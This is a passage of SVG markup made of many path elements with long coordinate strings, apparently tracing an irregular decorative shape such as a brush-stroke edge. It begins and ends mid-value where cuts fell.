d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1